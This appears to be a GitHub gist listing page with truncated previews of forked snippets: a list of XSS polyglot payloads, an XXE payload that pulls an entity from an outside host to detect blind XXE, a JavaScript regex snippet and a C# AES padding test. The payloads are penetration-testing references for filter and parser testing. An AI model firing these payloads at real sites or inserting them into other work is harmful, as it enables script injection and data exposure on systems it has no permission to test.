Skip to content

Instantly share code, notes, and snippets.

@eoftedal
eoftedal / xss-polyglots.txt
Created October 10, 2019 16:57 — forked from michenriksen/xss-polyglots.txt
XSS Polyglot payloads
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script>
javascript:`</template>\"///"//<
@eoftedal
eoftedal / XXE_payloads
Created July 7, 2017 14:49 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@eoftedal
eoftedal / gist:2046582
Created March 15, 2012 20:11 — forked from thomaseggum/gist:2044229
attempt
var mynamespace = mynamespace || {};
(function(){
var counter = { count: 0 };
function incrementCounter(){
counter.count++;
}
mynamespace.someobject = {
counter : counter,
var txt = "Dette vil slette elevtelling og all tilhørende elevdata. Ønsker du å fortsette?";
function regexSplit(re, txt) {
var reg = new RegExp(re);
var result = [];
var last;
var ar;
while(ar = reg.exec(txt)) {
result.push(ar[1]);
last = reg.lastIndex;
@eoftedal
eoftedal / EncryptionPaddingProblem.cs
Created May 18, 2011 17:14 — forked from follesoe/EncryptionPaddingProblem.cs
Padding problem with AesManaged
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
using System.Linq;
namespace CryptoTest
{
class Program
{